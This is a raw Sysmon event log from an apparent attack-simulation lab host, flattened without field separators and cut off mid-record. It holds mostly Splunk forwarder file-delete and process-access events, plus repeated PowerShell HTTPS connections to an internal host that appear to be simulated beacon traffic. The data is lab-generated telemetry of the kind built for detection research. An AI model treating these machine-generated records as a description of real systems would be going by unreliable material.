13:24:15.267{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50689-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:45.020{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C023A7A0BEBFAD3CD7E9FB4A6A4459B1,SHA256=1B9F43270402AD48037D9BFCC87EF13687F0DBBA279E98B142FB942D542DD331,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:46.052{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=219075C0F313812BEB024E2E6F50A4C6,SHA256=7FDFB92421EA3E0CF6900764B6D077EE7FD4EB48115EDF1236534D84000F28FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:47.071{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DD96BD0CE3BDD79BB925551C46D497C,SHA256=A9A41889955AF041D9FB48FD8449B38C6278DD66C35BA45C5CB18B2D2D8881F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:48.102{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1332391F81C8F5220A019D2571622580,SHA256=2F4D3EBB51D0627BFC47B1576B0600002D8E5A1E1415DD28D7FAA4E2717953BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:49.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3255F7E775859A38DE19D830F205F5B3,SHA256=7F17F30034F147A02DB431B6217CE3A39B2DC7E2078B4CBDDF1B1D02E6CACB6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:50.615{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B0EAAC8DB813EDAE7ADDBCF40B81FF5A,SHA256=ADC4F619233C3D8BA6E3F447FEE364BBA2F143F01D11431A14EAFECEB5823B26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.794{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50690-false10.0.1.12-8000- 23542300x800000000000000036498796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:50.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90099157B97A7B11D911D28BFE5277DE,SHA256=1336842E4C132831ACC947F4A6E5B84632D1B7962306B4BD2C435BC9976C1784,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:21.277{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50691-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:51.198{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E825777D92CFA6D6D0E4968E89B907BB,SHA256=5FCC734E058ECFA66F7C67439CD76CD23F67664070FD8BD1FC2C2B6C58BE40E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:52.228{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=484E7A7D3CC3F79FA6445FEF0B41A6AE,SHA256=100BA9F30D7AC68491EF758104EF3F4C239256A75DB1D2DDAFAA88687A9F0F13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:53.244{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EB68CC3DD0ECBA82ADB4ACFA4E9EC97,SHA256=D7126047E92053D7FBAD200D55F50731604CEE787061A3E36F26C715E3AAB705,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:54.610{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4805FFFB2DE09C3FE21ECC68B07E62BF,SHA256=E13E75B647314AD1D5DA4CF253AEF6854FF749EA5EFD563576E55EE176FEA61E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:54.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06EF4F32DCDD34EC9234CF6BAAE189F8,SHA256=4D39A483797421CFB2EF0F886068139135457287B481A9322D62EB40806E3EBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:25.802{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50693-false10.0.1.12-8000- 354300x800000000000000036498806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:25.288{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50692-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:55.310{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC5DFE5E6D98328EC0354C6CD27AE9F6,SHA256=7017F3D76B7D74C3502C40AA88E0CD4FA1BBEDF5124E607B42C633FAE6231B39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:56.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92FB765E69466C078695668EF3504A2C,SHA256=15FA4441107BE6320DE94986C3C14DEC5B80D27926C46893C72CBBE45FAE2E5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:56.324{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a38bb16.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:57.360{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA26C46211A40FC2393E21C2AE66C802,SHA256=47F4D1BC543ACA2EEEC7EF5061052ACDF978061F5888F20F8D77F1FD0D7E49C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:58.641{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C88BDB96046EB86508DE288F4D9BF82A,SHA256=4BE24DF061B76AC10123CAD8E52B324BE8BAC7849ED79ED4FBEAD8E84B6FC48C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:58.390{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1836524F7E9178B4C4B64916D93F361F,SHA256=84D06CA0B3C36E9F9A694BC8D1E54EB69C955639866C9A6D5B43DCAA00D8EB68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:29.299{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50694-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:59.420{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35EC39B5CB4B3E27B90F3C8D430CB137,SHA256=17854B425384386C37BF4391CE8BFE8268B87DD5428430A2870C51BAC5CB2029,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:30.813{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50695-false10.0.1.12-8000- 23542300x800000000000000036498815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:00.438{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8173105533EA94345B38E653092E28E,SHA256=B3780C905C929D5BC24DF273C348FB6C50FAD1BA57D2271B18EBD0629BE8A000,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:01.486{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD9C0FC2F854828079B7484704DD9BA,SHA256=02F34D8292EC17D49C38EF749A7CCF197B9D36EF13E651C1846B3F0521CA2F34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:02.838{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2E4ED5E1823BEFA2C581E2ABC27E07A4,SHA256=CF0927EDF7E1400E858C6E802224BF6089585CFF4122E40314816B2D9EA2CEFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:02.618{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=894A3A13A98E45C9B3DC2256A6238689,SHA256=3ABE28EE71CEE9B0727A95E6DA0FB878E2EA84C4D422DAC274CA28356E51EEBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:33.311{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50696-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:03.635{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57A5486B675FB5CAA647D3FAB1852106,SHA256=426C24314830E0CB50F7D3F8D1BCC4966829057F46539F6FDE65CBFEE363F163,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:04.716{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2EA78A30D22BC973B78C0995AFE43BB,SHA256=12F8F211BB3FF6FE7FD05042A88068A3C3DB546621C14B1F86F00CDE1A0721B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:05.733{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D66DDC1759DAB98CCA6DC3B7EEB77F0,SHA256=345B53C00EC5C0C405215B8FF842BFC81F1188AB90455C50D2893BF005B2CF59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:06.737{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3216E9B863DAFA41214D3DA0297DE23,SHA256=63D5D8571C8E9F2D65864E8F83A6F1D16B8AD365F322175810021921175B80C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.840{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A277-6140-BA56-04000000C801}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.840{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.840{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.840{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.840{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.840{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A277-6140-BA56-04000000C801}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.840{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A277-6140-BA56-04000000C801}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.835{B81B27B7-A277-6140-BA56-04000000C801}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=098F935C5F421837A4AD981D4BBFCD39,SHA256=885DC11D1085EEBE4EA7E6485AE1CEC08CB01B004099675ED3E981E78E2A3FC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2148CAC7564CF1509B909AA52A39340F,SHA256=032D94F475A3DCAD0D1CC71E80FE04AAE59F90794846D2B895B7D65F553235BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 